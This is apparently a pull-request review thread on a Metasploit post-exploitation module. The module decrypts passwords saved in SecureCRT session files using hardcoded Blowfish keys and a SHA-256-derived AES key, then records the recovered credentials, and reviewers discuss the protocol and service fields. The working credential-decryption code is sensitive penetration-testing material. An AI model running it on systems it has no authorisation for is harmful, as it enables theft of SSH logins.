modules/post/windows/gather/credentials/securecrt.rb

```diff
@@ -0,0 +1,195 @@
+      if file_contents.nil? || file_contents.empty?
+        next
+      end
+
+      file = try_encode_file(file_contents)
+      hostname = Regexp.compile('S:"Hostname"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
+      password = Regexp.compile('S:"Password"=u([0-9a-f]+)').match(file) ? securecrt_crypto(Regexp.last_match(1)) : nil
+      passwordv2 = Regexp.compile('S:"Password V2"=02:([0-9a-f]+)').match(file) ? securecrt_crypto_v2(Regexp.last_match(1)) : nil
+      port = Regexp.compile('D:"\[SSH2\] Port"=([0-9a-f]{8})').match(file) ? Regexp.last_match(1).to_i(16).to_s : nil
+      username = Regexp.compile('S:"Username"=([^\r\n]*)').match(file) ? Regexp.last_match(1) : nil
+      tbl << {
+        file_name: item['name'],
+        hostname: hostname,
+        port: port,
+        username: username,
+        password: password || passwordv2
+      }
+    end
+    return tbl
+  end
+
+  def securecrt_crypto(ciphertext)
+    key1 = "\x24\xA6\x3D\xDE\x5B\xD3\xB3\x82\x9C\x7E\x06\xF4\x08\x16\xAA\x07"
+    key2 = "\x5F\xB0\x45\xA2\x94\x17\xD9\x16\xC6\xC6\xA2\xFF\x06\x41\x82\xB7"
+    ciphered_bytes = [ciphertext].pack('H*')
+    cipher_tmp = blowfish_decrypt(key1, ciphered_bytes)[4..-5]
+    padded_plain_bytes = blowfish_decrypt(key2, cipher_tmp)
+    (0..padded_plain_bytes.length).step(2) do |i|
+      if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
+        return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
+      end
+    end
+    print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
+    return nil # We didn't decode the password successfully, so just return nil.
+  end
+
+  def securecrt_crypto_v2(ciphertext)
+    iv = ("\x00" * 16)
+    config_passphrase = datastore['PASSPHRASE'] || nil
+    key = OpenSSL::Digest::SHA256.new(config_passphrase).digest
+    aes = OpenSSL::Cipher.new('AES-256-CBC')
+    aes.key = key
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = iv
+    padded_plain_bytes = aes.update([ciphertext].pack('H*'))
+    plain_bytes_length = padded_plain_bytes[0, 4].unpack1('l') # bytes to int little-endian format.
+    plain_bytes = padded_plain_bytes[4, plain_bytes_length]
+    plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
+    if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
+      return plain_bytes.force_encoding('UTF-8')
+    end
+
+    print_warning('It seems the user set a configuration password when installing SecureCRT!')
+    print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
+    return nil
+  end
+
+  def securecrt_store_config(config)
+    service_data = {
+      address: config[:hostname],
+      port: config[:port],
+      service_name: 'ssh',
+      protocol: 'tcp',
```

Comment:
These to me seem a bit odd. Are all the protocols that the client supports all TCP based? Are we sure none of them are UDP based? Also the client doesn't just support SSH, it also supports Telnet and several other protocols, all of which could have an associated session file.

If you are going to be storing creds like this, then you should really have some way to determine these fields based on the session file and update them accordingly. Otherwise you may incorrectly be stating that you stole an SSH cred for a server when in reality it was a Telnet server, or you may state that the service runs over TCP when in fact it runs over UDP.

Reply:
@cn-kali-team Made an update that has since resolved this issue. Closing this as resolved.

Reply:
@cn-kali-team You are still assuming all of the protocols here are `tcp`. Whilst the `service_name` issue I mentioned here has been resolved, the `protocol` issue has not, as the protocol could very well also be `udp` or some other protocol besides `tcp`.

Reply:
Marking this as resolved. After further investigation it was found that SecureCRT only supports TCP at this point in time, and only supports saving passwords in the way that we expect for SSH sessions. There are ways to save passwords for automatic logins for other types of sessions however.